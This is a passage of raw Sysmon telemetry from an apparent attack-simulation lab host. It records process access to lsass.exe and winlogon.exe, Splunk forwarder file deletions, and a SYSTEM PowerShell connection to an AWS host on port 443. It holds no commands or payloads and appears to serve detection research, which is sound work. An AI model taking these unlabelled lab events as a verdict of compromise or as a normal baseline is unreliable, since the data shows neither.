 10341000x8000000000000000150470Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-0E00-00000000D101}880C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150469Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0D00-00000000D101}788C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150468Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0D00-00000000D101}788C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150467Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0C00-00000000D101}720C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150466Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0C00-00000000D101}720C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150465Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150464Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150463Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0900-00000000D101}564C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150462Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F64-60CA-0900-00000000D101}564C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 23542300x8000000000000000150461Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.162{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA8AA1C8D240C4F45EBC67C5322A0F48,SHA256=BC528275356D295A01AD6DC9A791757A53C358793F9C130C78D9C79AE6114993,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000151267Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.025{39BD8DE3-2672-60CA-E003-00000000D101}5836C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58390-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 23542300x8000000000000000151266Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.835{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=74D5185CD1E3D07B748F0271AE005783,SHA256=7E22ED780279CE7A9BA13894585DF92389CA01FD96A323A58C7993694B2FA782,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151265Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.835{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=557A475345A1B9A0A4BC354F57D0B3E6,SHA256=615B5FF020A36EC311A9647D5A25D59732D3B8A0AFF350B28FCA07729304D4B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151264Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.835{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=55C124FA8577FF945A90208FAF1A8A08,SHA256=2FEC13BDB66890548706287333C1AD981F8926108E955BA8D13D3368B325DADD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000151263Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.332{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151262Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.332{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151261Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.332{39BD8DE3-0F64-60CA-0B00-00000000D101}6245668C:\Windows\system32\lsass.exe{39BD8DE3-0F65-60CA-1600-00000000D101}1164C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151260Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.232{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-3FF8-60CA-FA06-00000000D101}5428C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+5fbdb|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151259Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.232{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-3FF8-60CA-FA06-00000000D101}5428C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151258Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.232{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-3FF8-60CA-FA06-00000000D101}5428C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151257Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-7105-60CA-1A0D-00000000D101}3200C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151256Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-7105-60CA-1A0D-00000000D101}3200C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYST